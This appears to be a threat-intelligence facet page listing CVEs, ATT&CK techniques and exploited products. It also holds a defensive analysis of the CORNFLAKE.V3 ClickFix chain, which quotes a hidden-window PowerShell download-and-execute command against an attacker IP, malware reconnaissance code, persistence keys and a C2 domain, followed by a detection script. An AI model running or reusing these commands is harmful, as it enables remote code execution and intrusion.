CVE-2025-37775 CVE-2025-37776 CVE-2025-37777 CVE-2025-37926 CVE-2025-37947 CVE-2025-37956 CVE-2025-38352 CVE-2025-3928 CVE-2025-40596 CVE-2025-40597 CVE-2025-40598 CVE-2025-41420 CVE-2025-42957 CVE-2025-42999 CVE-2025-4322 CVE-2025-43300 CVE-2025-4428 CVE-2025-46407 CVE-2025-46410 CVE-2025-46411 CVE-2025-47152 CVE-2025-47227 CVE-2025-47228 CVE-2025-47984 CVE-2025-48005 CVE-2025-48530 CVE-2025-48539 CVE-2025-48543 CVE-2025-48732 CVE-2025-48757 CVE-2025-48807 CVE-2025-49704 CVE-2025-49706 CVE-2025-49707 CVE-2025-49712 CVE-2025-49743 CVE-2025-50128 CVE-2025-50129 CVE-2025-50165 CVE-2025-50167 CVE-2025-50168 
CVE-2025-50171 CVE-2025-50176 CVE-2025-50177 CVE-2025-5086 CVE-2025-52456 CVE-2025-52461 CVE-2025-52543 CVE-2025-52544 CVE-2025-52545 CVE-2025-52546 CVE-2025-52547 CVE-2025-52548 CVE-2025-52549 CVE-2025-52550 CVE-2025-52551 CVE-2025-52581 CVE-2025-52930 CVE-2025-53084 CVE-2025-53085 CVE-2025-53109 CVE-2025-53132 CVE-2025-53147 CVE-2025-53156 CVE-2025-53399 CVE-2025-53510 CVE-2025-53511 CVE-2025-53518 CVE-2025-53557 CVE-2025-53652 CVE-2025-53690 CVE-2025-53731 CVE-2025-53733 CVE-2025-53740 CVE-2025-53766 CVE-2025-53767 CVE-2025-53770 CVE-2025-53771 CVE-2025-53773 CVE-2025-53774 CVE-2025-53778 CVE-2025-53779 CVE-2025-53781 CVE-2025-53784 CVE-2025-53786 CVE-2025-53787 CVE-2025-53792 CVE-2025-53793 CVE-2025-53853 CVE-2025-5394 CVE-2025-54132 CVE-2025-54136 CVE-2025-54462 CVE-2025-54480 CVE-2025-54939 CVE-2025-54948 CVE-2025-54987 CVE-2025-55177 CVE-2025-55190 CVE-2025-55284 CVE-2025-55305 CVE-2025-57788 CVE-2025-57789 CVE-2025-57790 CVE-2025-57791 CVE-2025-6204 CVE-2025-6218 CVE-2025-6519 CVE-2025-7771 CVE-2025-7775 CVE-2025-7776 CVE-2025-8088 CVE-2025-8424 CVE-2025-8875 CVE-2025-8876 CVE-2025-9132 CVE-2025-9363 CVE-2025-9377 CVE-2025-9478 CVE-XXXX-Citrix_NetScaler_zero-day
MITRE ATT&CK TTP All Application Layer Protocol: T1071 Cloud Accounts: T1078.004 Code Injection: T1505.002 Command and Scripting Interpreter: T1059 Command and Scripting Interpreter: PowerShell: T1059.001 Command and Scripting Interpreter: T1059.003 Compromised Credentials: T1552 Content Injection: T1659 Credentials from Password Stores: T1555 Data Encrypted for Impact: T1486 Defacement: T1659 Deobfuscate/Decode Files or Information: T1140 DNS Management: T1659 Drive-by Compromise: T1189 Email Forwarding Rule: T1114.003 Exploit Public-Facing Application: T1190 Exploitation for Client Execution: T1203 Exploitation for Privilege Escalation: T1068 Exploitation of Remote Services: T1210 External Remote Services: T1133 File and Directory Discovery: T1083 Impair Defenses: T1562 Indicator Removal: T1070 Ingress Tool Transfer: T1105 Inhibit System Recovery: T1490 Input Capture: T1056 Lateral Tool Transfer: T1570 Modify Registry: T1112 Native API: T1106 Non-Application Layer Protocol: T1095 Obfuscated Files or Information: T1027 OS Credential Dumping: T1003 Path Traversal: T1570 Phishing: T1566 PowerShell: T1059.001 Process Injection: T1055 Proxy: T1090 Remote Code Execution: T1210 Remote Services: T1021 Replication Through Removable Media: T1091 Scheduled Task/Job: T1053 Screen Capture: T1113 Service Stop: T1489 Spearphishing Attachment: T1193 Spearphishing Link: T1192 Supply Chain Compromise: T1195 System Information Discovery: T1082 Trusted Relationship: T1199 Unsecured Credentials: T1552 Valid Accounts: T1078 Windows Command Shell: T1059.003 Windows Management Instrumentation: T1047
Several of these facet labels do not match the ATT&CK technique they cite: Defacement is T1491 (T1659 is Content Injection, and "DNS Management" is not a technique under T1659 either); T1570 is Lateral Tool Transfer, not path traversal; T1505.002 is Server Software Component: Transport Agent, not generic code injection; T1210 is Exploitation of Remote Services rather than a generic "remote code execution" label; T1552 is Unsecured Credentials; and T1192/T1193 are retired IDs now folded into Phishing: Spearphishing Link (T1566.002) and Spearphishing Attachment (T1566.001).
This facet also leaked the per-article TTP evidence (context, quotes, independent analysis and contradictions) for two entries. What can be recovered from it:
CORNFLAKE.V3 / UNC5774 ClickFix chain (Mandiant's analysis). Initial access is a ClickFix lure page: when the visitor clicks an image, the page copies a hidden script to the clipboard and tricks the user into pasting it into the Windows Run dialog (Windows+R). Evidence of the paste survives in the HKEY_USERS\User\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU registry key, which held the entry that fetched and ran the next payload: powershell -w h -c "$u=[int64](([datetime]::UtcNow-[datetime]'1970-1-1').TotalSeconds)-band 0xfffffffffffffff0;irm 138.199.161[.]141:8080/$u|iex" The command runs PowerShell with a hidden window (-w h), uses the current UTC Unix time with its low four bits cleared (a multiple of 16) as the URL path, so every request falls into a 16-second bucket the server can key on, downloads the response with irm (the alias of Invoke-RestMethod; iwr is the alias of Invoke-WebRequest) and executes it with iex. Because the user executes the command themselves, this is client-side execution (T1203 / T1204 style user execution), and the irm/iwr downloads are Ingress Tool Transfer (T1105) of the Node.js runtime, the PHP interpreter, the CORNFLAKE.V3 variants and the WINDYTWIST.SEA backdoor.
The first payload observed on the host was a batch script containing reconnaissance commands run through cmd.exe (T1059.003) to collect domain and Active Directory information. A PowerShell dropper then downloads the Node.js zip ("# Download the Node.js zip file." followed by iwr -Uri $ZipURL -OutFile $ZipFile) and carries the CORNFLAKE.V3 sample inline as Base64 ($BASE64STRING =<Base-64 encoded CORNFLAKE.V3 sample> ... $BINARYDATA = [Convert]::FromBase64String($BASE64STRING)); the script is otherwise unobfuscated, so the Base64 wrapper is only a thin layer that hides the payload from casual inspection (T1027 / T1140).
Persistence: the atst function, called by main, creates the registry Run key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ChromeUpdater for the Node.js sample; the PHP variant uses HKCU\Software\Microsoft\Windows\CurrentVersion\Run\iCube. Both values execute the malware at user logon and are modifications of the Registry (T1112); the page files them under Scheduled Task/Job (T1053), but a Run key is a logon autostart (Boot or Logon Autostart Execution: Registry Run Keys, T1547.001), not a scheduled task. Files the malware creates and uses, mainly under AppData (T1083): C:\Users\<User>\AppData\Roaming\node-v22.11.0-win-x64\ckw8ua56.log (copy of the CORNFLAKE.V3 Node.js sample used for persistence); C:\Users\<User>\AppData\Roaming\php\config.cfg (CORNFLAKE.V3 PHP sample, as seen in Figure 2); C:\Users\<User>\AppData\Roaming\Shift194340\78G0ZrQi.png (WINDYTWIST.SEA backdoor dropped by CORNFLAKE.V3 PHP).
Command and control: CORNFLAKE.V3 has also been observed abusing Cloudflare Tunnels to proxy traffic to remote servers; the C2 associated with UNC5774 was varying-rentals-calgary-predict.trycloudflare[.]com. The tunnel masks the real destination server and lets the traffic blend in with legitimate Cloudflare activity (Proxy, T1090). The article does not name other application-layer protocols used for C2.
Discovery: the Node.js sample collects system information with the following call (quoted from the article): let cmd = execSync('chcp 65001 > $null 2>&1 ; echo \'version: ' + ver + '\' ; if ([Security.Principal.WindowsIdentity]::GetCurrent().Name -match '(?i)SYSTEM') { \'Runas: System\' } elseif (([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { \'Runas: Admin\' } else { \'Runas: User\' } ; systeminfo ; echo \'=-=-=-=-=-\' ; tasklist /svc ; echo \'=-=-=-=-=-\' ; Get-Service | Select-Object -Property Name, DisplayName | Format-List ; echo \'=-=-=-=-=-\' ; Get-PSDrive -PSProvider FileSystem | Format-Table -AutoSize ; echo \'=-=-=-=-=-\' ; arp -a', { encoding: 'utf-8', shell: 'powershell.exe', windowsHide: true }); It reports the privilege level (SYSTEM, Admin or User), systeminfo, running tasks and their services (tasklist /svc), service details (Get-Service), available drives (Get-PSDrive) and the ARP table (arp -a), all of which map to System Information Discovery (T1082) and are typically used to plan further exploitation or lateral movement. Contradictions noted in the analysis: the article gives no evidence of a specific exploited public-facing application or of an external remote service, so T1190 and T1133 cannot be confirmed for this entry.
Jaguar Land Rover (JLR) incident. The article reports a cyber incident and access to JLR's IT systems; the group (Scattered Lapsus$ Hunters) shared screenshots reportedly taken from inside JLR's IT networks on the messaging app Telegram, and Telegram is the only application-layer channel the article evidences, used only for sharing the screenshots. "It has not been confirmed whether any data has been stolen or if Scattered Lapsus$ Hunters installed ransomware", so Data Encrypted for Impact (T1486) remains a possibility without direct evidence. "All three groups are known for their use of social engineering techniques to gain entry into targets"; "Scattered Spider and ShinyHunters have used vishing techniques to gain high value credentials in third-party IT providers", which is how they obtain Valid Accounts (T1078), "with the group collaborating on techniques and the data they have available to enhance their attacks". The threat actors have clearly come together to improve the effectiveness of establishing initial access to victims. The article's language is vague on the entry vector: social engineering could include phishing, but no links, attachments or impersonation are described, so Phishing (T1566) cannot be confirmed; nothing is said about VPNs or other remote access tools, so External Remote Services (T1133) cannot be inferred; and the methods used to leverage the accounts after compromise are not detailed.
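The ClickFix chain above leaves three telemetry traces a defender can key on: the Run-dialog command itself (a PowerShell download cradle with a hidden window and a raw IP:port URL), its copy in the Explorer RunMRU key, and HKCU Run values that start an interpreter dropped under AppData\Roaming. The following is an added detection sketch, not code from the page or from Mandiant. It runs offline over constructed process-creation and registry events; the Event field names, the victim profile path and the exact command lines behind the ChromeUpdater and iCube Run values are assumptions (the page gives only the key names, value names and file paths).

```python
"""Detection sketch for the ClickFix -> CORNFLAKE.V3 chain (added example).

Rules:
  1. ps_download_cradle / ps_hidden_window / ps_raw_ip_c2: PowerShell running
     irm/iwr piped into iex, from a hidden window, against a raw IP:port;
  2. runmru_clickfix_paste: the same cradle persisted in Explorer\\RunMRU;
  3. run_key_appdata_interpreter: an HKCU Run value launching an interpreter
     (node, php, powershell, ...) from a directory under AppData\\Roaming.
Event fields and the Run-value command lines are assumptions, not page content.
"""
import re
from dataclasses import dataclass


@dataclass
class Event:
    event: str          # "process" or "registry"
    image: str = ""     # process image path (process events)
    command_line: str = ""
    key: str = ""       # registry key path (registry events)
    value_name: str = ""
    value_data: str = ""


# irm/iwr (or their long names) whose output is piped straight into iex.
DOWNLOAD_CRADLE = re.compile(
    r"\b(irm|iwr|invoke-restmethod|invoke-webrequest)\b[^|;]*\|\s*(iex|invoke-expression)\b",
    re.IGNORECASE)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.IGNORECASE)
IP_PORT_URL = re.compile(r"(?:https?://)?\d{1,3}(?:\.\d{1,3}){3}:\d{2,5}/")
RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run$", re.IGNORECASE)
RUNMRU_KEY = re.compile(r"\\Explorer\\RunMRU$", re.IGNORECASE)
# An interpreter launched from a directory under %APPDATA% (Roaming).
APPDATA_INTERPRETER = re.compile(
    r'\\AppData\\Roaming\\[^"]*\\(node|php|powershell|wscript|cscript|mshta)(\.exe)?\b',
    re.IGNORECASE)


def classify_command(cmd):
    """Rule names that fire on one PowerShell command line (defanged IPs accepted)."""
    cmd = cmd.replace("[.]", ".")
    hits = []
    if DOWNLOAD_CRADLE.search(cmd):
        hits.append("ps_download_cradle")
        if HIDDEN_WINDOW.search(cmd):
            hits.append("ps_hidden_window")
        if IP_PORT_URL.search(cmd):
            hits.append("ps_raw_ip_c2")
    return hits


def scan(events):
    """Return (rule, event_index) pairs, in event order, for every rule that fires."""
    findings = []
    for i, ev in enumerate(events):
        if ev.event == "process":
            if ev.image.lower().rsplit("\\", 1)[-1] in ("powershell.exe", "pwsh.exe"):
                findings.extend((rule, i) for rule in classify_command(ev.command_line))
        elif ev.event == "registry":
            if RUNMRU_KEY.search(ev.key) and classify_command(ev.value_data):
                findings.append(("runmru_clickfix_paste", i))
            if RUN_KEY.search(ev.key) and APPDATA_INTERPRETER.search(ev.value_data):
                findings.append(("run_key_appdata_interpreter", i))
    return findings


# The Run-dialog command quoted on the page, kept defanged.
CLICKFIX_CMD = r'''powershell -w h -c "$u=[int64](([datetime]::UtcNow-[datetime]'1970-1-1').TotalSeconds)-band 0xfffffffffffffff0;irm 138.199.161[.]141:8080/$u|iex"'''
APPDATA = r"C:\Users\victim\AppData"   # constructed victim profile
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"


def sample_events():
    """Constructed telemetry: the page's artefacts plus two benign controls."""
    run_key = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
    return [
        Event("process", image=PS_EXE, command_line=CLICKFIX_CMD),
        Event("registry", key=r"HKEY_USERS\S-1-5-21-1-2-3-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU",
              value_name="a", value_data=CLICKFIX_CMD + r"\1"),
        Event("registry", key=run_key, value_name="ChromeUpdater",   # assumed command line
              value_data=rf'"{APPDATA}\Roaming\node-v22.11.0-win-x64\node.exe" "{APPDATA}\Roaming\node-v22.11.0-win-x64\ckw8ua56.log"'),
        Event("registry", key=run_key, value_name="iCube",           # assumed command line
              value_data=rf'"{APPDATA}\Roaming\php\php.exe" "{APPDATA}\Roaming\php\config.cfg"'),
        Event("process", image=PS_EXE,                                # benign admin activity
              command_line='powershell.exe -NoProfile -Command "Get-Service | Select-Object Name"'),
        Event("registry", key=run_key, value_name="OneDrive",        # benign autostart
              value_data=rf'"{APPDATA}\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    ]


if __name__ == "__main__":
    for rule, idx in scan(sample_events()):
        print(f"{rule:30} event #{idx}")
```

The cradle rule deliberately ignores the dropper's later iwr -Uri $ZipURL -OutFile $ZipFile, which writes to disk rather than piping into iex; a file-write rule on Invoke-WebRequest with -OutFile into AppData would cover that stage. The Run-key rule keys on the interpreter's location rather than its name, since the page shows the actors renaming payloads to .log, .cfg and .png while leaving the runtime (node.exe, php.exe) in place.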
Exploited Software All .edu Domains @nx @nx/devkit @nx/enterprise-cloud @nx/eslint @nx/js @nx/key @nx/node @nx/workspace 1Password 5G 5G Network Active Directory Adobe Commerce (Magento) AES-128 Agentic AI AI Agents AI Models (OpenAI, xAI) Airtel Zerotouch router Alone theme Amazon accounts Amazon ECS Amazon Q Developer Amazon Q Developer VS Code extension Amazon Q Developer VS Code Extension Amazon Q Developer VS Code Extension (Amazon Q) AMD Zen 2 CPUs Amp Amp Code amsdk.sys (WatchDog Antimalware driver) Android Android Applications Android Apps Android Devices Android Kernel Android Runtime Android Runtime (ART) Android Runtime Environment Android System Android System component Android VPN Apps (Group A) Android VPN Apps (Group B) Android VPN Apps (Group C) Anthropic Claude 4 Sonnet Anthropic Filesystem MCP Server Anthropic's Filesystem MCP Server Anthropic’s MCP Inspector Anthropic's Slack MCP Server AnyDesk Apache Apache ActiveMQ Apache Tomcat Apple Advanced Protection Program Apple ID Apple Image I/O framework Apple iOS Apple iPadOS Apple macOS Argo CD ASP.NET ASP.NET ViewState AsyncRAT Atera Atomic macOS Stealer (AMOS) Auth0 AWS Certificate Manager AWS Kiro AWS Trusted Advisor Bachtrack server Backup Systems BadBazaar BadBox botnet BadPotato BadPotato and EfsPotato banking/government apps Base44 bcmbipdll.dll BIG-IP Bitbucket BitChat Bitdefender Bl00dy ransomware Black Basta BlackSuit ransomware BlotchyQuasar Box Broadcom BCM5820X Broadcom's implementation of the adapters required to interface with the Windows Biometric Framework (WBF) Bybit's compromised supply chain C programming language C# Random Caesars Entertainment California State Water Board website CANONSTAGER CapCut Carmaker's Online Dealership Portal Case Management/Electronic Case Files (CM/ECF) CastleLoader CastleRAT Cellular Modems (Multiple Vendors) Change Healthcare Chaos ransomware Chase Bank ChatGPT ChatGPT app ChatGPT Codex ChatGPT Connectors ChatGPT's Agent mode Chrome CI/CD Pipelines 
Cisco Cisco Identity Services Engine (ISE) and ISE Passive Identity Connector (ISE-PIC) Cisco IOS Cisco IOS and Cisco IOS XE Cisco IOS and Cisco IOS XE software Cisco IOS and IOS XE Software Cisco IOS and IOS XE software (CVE-2018-0171) Cisco IOS Smart Install Cisco IOS Software Smart Install Feature Cisco Networking Devices Cisco Secure Firewall Management Center (FMC) Cisco Secure Firewall Management Center Software Cisco Smart Install (SMI) Citrix NetScaler Citrix NetScaler ADC and Gateway City of Dallas servers Claude Claude (Anthropic) Claude AI Chatbot Claude Code Claude Code AI tool Claude Sonnet 3.7 CleanMyMac CLEO MFT platforms (Harmony, VLTrader, Lexicom) ClickFix Cline cloud solution providers Cobalt Strike Colt Online Colt Technology Services (Potentially via CVE-2025-53770) Commvault Commvault Web Server Commvault's backup platform Commvault's QCommands Comodo Dragon Compromised Systems ConnectWise ContagiousDrop applications Conti ControlVault Windows APIs Copeland E2 controllers Copeland E3 controllers CORNFLAKE.V3 CosMc's Promotional Membership Coupon Criteo OneTag Shared Storage API worklet (https://fledge.criteo.com/interest-group/abt/worklet) Cryptocurrency mining software curl.exe Cursor Cursor IDE Cylance Danabot Dassault DELMIA Apriso DcRAT Deep Research Agents Dell ControlVault3 Dell ControlVault3 Firmware Dell ControlVault3 Plus Devin AI Digital Video Recorders Digital Video Recorders (DVRs) and WiFi routers DNS Management dnscat2 dnspot Domain Admin Accounts Domain User Accounts DoorDash Drift Dropbox Eclipse ThreadX FileX Eclipse ThreadX FileX 8.5 Eclipse ThreadX FileX git commit 1b85eb2 EfsPotato Elastic Defend EDR Elasticsearch Electron-based applications Entra ID Envoy ERMAC Android Banking Trojan ESET eslint-config-prettier eslint-plugin-prettier F-Secure Facebook Facewatch Facial Recognition Technology (FRT) systems Family A VPN Apps (Innovative Connecting, Autumn Breeze, Lemon Clove) Family B VPN Apps (Global VPN, XY VPN, Super Z 
VPN) Family C VPN Apps (Fast Potato VPN, X-VPN) file:///home/oai/redirect.html find Firefox Flask web application FortiClient Endpoint Management Server Fortinet Fortinet Network Management Tool Fortinet SSL VPNs Foxit PDF Reader Foxit Reader Fraudulent cryptocurrency apps FreePBX FreeVPN.One FreeVPN.One Chrome extension FScan Gemini Gemini CLI Gemini's API Gemini's API via the llm CLI Gemini's web interface Genspark Git Repositories GitHub GitHub Copilot GitHub Copilot Agent GitLab GiveWP WordPress donation plugin Gmail Google accounts Google Android (Qualcomm vulnerabilities) Google Assistant on an Android phone Google Chrome Google Gemini CLI Google Jules Google Pixel 7 Google Workspace Google's Agent Development Kit (ADK) Google’s Gemini 2.5 Pro Google's gemini-cli GPS Receivers GPT-4o GPT-5 Gravity Forms Plugin Great Firewall of China (GFW) Grindr Grok-4 gzip HAProxy HitManPro Hotel Booking Systems HRSword HTTP/1.1 HTTP/1.1 Server Implementations HTTPS Huawei equipment Huawei P40 Pro IAM Systems (Okta, Azure AD, Internal Authentication Services) IBM WebSphere iCloud Calendar iiNet order management system iiNet's order creation and tracking system Image I/O Framework Image I/O Framework (iOS/macOS) ImageIO Inotiv Systems and Data Inotiv's internal systems and data Intel CPUs Internet Explorer Internet Information Services (IIS) Internet of Things (IoT) computers and devices internet-facing appliances, including small office/home office devices Intradev's systems Iodine iOS IoT devices, routers, servers, and PCs iPadOS Israeli Live News website Ivanti Connect Secure and Policy Secure Ivanti Endpoint Manager Mobile (EPMM) j.js JAMF Java codebases Java program Jenkins Jenkins Git Parameter Plugin Jetty Jira JPEG2000 JPush JuicyPotato Jules Kaseya Kaspersky KaWaLocker ransomware ksmbd LameHug malware Lampion language server Large Language Models (LLMs) LastPass Latrodectus Ledger Nano S Plus Ledger Nano X Legacy devices in healthcare Legal Aid Agency Systems Lenovo 
510 FHD and Lenovo Performance FHD webcams Libbiosig LimeRAT Linear Linksys RE-series models Linux kernel Linux Kernel Linux Kernel AF_VSOCK sockets Linux Kernel CVE-2024-50264 Linux kernel time subsystem LiteSpeed Web Server Llama-3-70b-instruct LLMs (Large Language Models) LockBit LockBit Black ransomware LockBit Windows encryptor Lovable LSQUIC Lumma Stealer LummaC2 LummaStealer M365 Copilot macOS macOS Sequoia macOS Sonoma macOS Ventura Mailchimp Make.com Manpower's network Manus Marks & Spencer Matanbuchus Loader MaterialX McAfee McDonald's Feel-Good Design Hub McDonald's Global Restaurant Standards portal McDonald's online delivery app McDonald's Staff Portals mcp-remote MedDream PACS Premium Mercedes-Benz (NTG6) Meta's Llama-3-8b-instruct MGM Resorts MGM World Microsoft Microsoft 365 Microsoft 365 accounts Microsoft 365 Copilot Microsoft Accounts Microsoft Applications via Entra OAuth Microsoft Azure cloud environment Microsoft cloud solution provider Microsoft Edge Microsoft Exchange Microsoft Exchange Server Microsoft Graphics Component Microsoft Installer (MSI) Microsoft Office Equation Editor Microsoft Quick Assist Microsoft SharePoint Microsoft SharePoint Server Microsoft software Microsoft Source Code Microsoft Teams Microsoft Windows Microsoft Word Microsoft's GitHub Copilot Mimikatz MintsLoader Mirai Mistral's Mistral-7b-instruct-v0.2 Mobile Devices Model Context Protocol (MCP) Motors theme MOVEit Transfer N-able N-central National Public Data Database NDI (Network Device Interface) Nefilim Ransomware Netflix and Paypal NetScaler ADC and NetScaler Gateway NetSupport Netty NetWalker network-attached storage (NAS) devices Nexar dashcams ngcp-rtpengine software NGINX Node.js Nomani Trojan npm NVIDIA Triton Inference Server Nvidia's H20 accelerators Nx Nx build system package Ollama Ollama Desktop On-premise Active Directory (AD) OnePlus Nord CE 2 Open source intelligence tools OpenAI Operator OpenAI’s “safe URL” rendering feature OpenAI's ChatGPT (open 
weight version) OpenAI's GPT Store OpenAI’s GPT-5 Fast OpenEXR OpenHands OpenLiteSpeed OpenSSH OpenSynergy Blue SDK Opera Browser Orange Belgium IT Systems Orange Group IT Systems Outdated software PACER Paradox.ai's Olivia Chatbot Passwordstate PayPal PDF-XChange Editor Perplexity's AI-powered browser Comet Phoenix Cryptolocker PHP Plex PowerSchool PowerShell PromptLock PsExec Pudu Robotics Backend Software PuTTY PyPI Python web server Python's TarFile.extractall() and TarFile.extract() Qilin ransomware Qualcomm Adreno GPUs Quantum ransomware RansomHub RDP RDP Wrapper RealBlindingEDR Redline/Meta Stealer Rejetto HTTP File Server (HFS) REMCOS RAT Remote Desktop Protocol Remote Desktop Protocol (RDP) ReVault Roblox Royal ransomware Ruby Marshal Deserialization Ruby Marshal Module Ruby on Rails RubyGems.org rundll32.exe Ryuk SaaS Accounts Safari SAIL Image Decoding Library Salesforce Salesloft Drift Samsung Galaxy S22 SAP NetWeaver SAP NetWeaver AS Java Visual Composer SAP S/4HANA Scalable Vector Graphics (SVG) School District Five of Lexington & Richland Counties' Computer Network ScriptCase SectopRAT SentinelOne SHA-1 Shadowsocks SharePoint SharePoint Servers Signal SIKE Simple Network Management Protocol (SNMP) SimpleHelp Sitecore Sitecore Active Directory 1.4 and earlier Sitecore Experience Manager (XM) and Sitecore Experience Platform (XP) Sitecore Experience Manager (XM), Experience Platform (XP), Experience Commerce (XC), and Managed Cloud Sitecore Experience Platform Sitecore XP 9.0 and Active Directory 1.4 and earlier versions Sitecore XP 9.0 and earlier Skoda Superb (MIB3) Slack Sliver Smartphone SMS payments, banking trojans and spyware Social Media Management Systems SoftEther SoftEther VPN SoftEther VPN client SoftEther VPN Client SOGU.SEC solana-pump-test solana-spl-sdk SolarWinds SonicOS SonicWall Gen 7 Firewalls SonicWall SMA100 series devices Sophos products South Korean software products South Korean Software Products SpectreJS Splashtop Sponsorship 
Management System (SMS) SQL SQL Injection Vulnerability SQLite SQLite FTS5 extension SSH sshd (OpenSSH server) SSL VPN ssp_dump_lsass STATICPLUGIN Symantec synckit SynologyPhotos Systems tar-fs TeaOnHer Telegram Telegraph Tenda AC6 Tenda AC6 Router Tenda AC6 V5.0 V02.03.01.110 The Biosig Project libbiosig The Co-op TheTruthSpy Third-Party Applications Third-party signed legitimate driver AToolsKrnl64.sys Third-party Software Package ThrottleStop.sys driver Thunderbird TightVNC TikTok Tizen OS tj-actions/changed-files GitHub Action Tor Browser TP-Link Archer C7 TP-Link Archer C7(EU) V2 and TL-WR841N/ND(MS) V9 (CVE-2025-9377) TP-Link Routers (CVE-2023-50224) TP-Link TL-WR841N/ND Trend Micro Trend Micro Apex One Tuya Smart Life App Twilio U.S. telecommunications infrastructure UE (User Equipment) Unpatched Servers USB drive VBScript VEED's Gen-AI Studio Vertex AI Studio Vertex AI with a Gemini back end Visual Studio Code VMware ESXi Volkswagen ID.4 (infotainment system: MEB ICAS3) Voting machines VPN Accounts VS Code VS Code Server Vulnerable Windows Drivers wamsdk.sys (Patched WatchDog Antimalware driver) WarmCookie Web Applications Web shells Webroot Websites (Yemen Ministry of Foreign Affairs, Yemen Ministry of Security Media and Israeli Live News) Websites affiliated with the Bharatiya Janata Party (BJP) Websites using HTTP protocol Websites using predictable session IDs Websites vulnerable to Cross-site request forgery (CSRF/XSRF) Websites vulnerable to Cross-site scripting (XSS) WhatsApp WhatsApp Business for iOS WhatsApp for iOS WhatsApp for Mac Wi-Fi Routers Windows Windows 10 Windows 11 Windows 2000 Windows CLFS Windows GDI+ Windows Kerberos Windows Message Queuing Windows NTLM Windows OS Windows Run dialog box or PowerShell terminal Windows Servers Windows Win32K - GRFX Windows-based workstations and servers Windsurf Windsurf Cascade Windsurf MCP Integration WINDYTWIST.SEA WinRAR WordPress Workday Workday's third-party CRM platform WWBN AVideo X2anylock (aka 
Warlock) ransomware xcopy.exe XenoRAT Xworm XWorm XZ-Utils Yemen Ministry of Foreign Affairs website Yemen Ministry of Security Media website YouTube YubiKey Zelle Zoom ZSAService.exe ZSATrayHelper.dll ZSATrayManager.exe ZSATunnel.exe Zscaler Client Connector
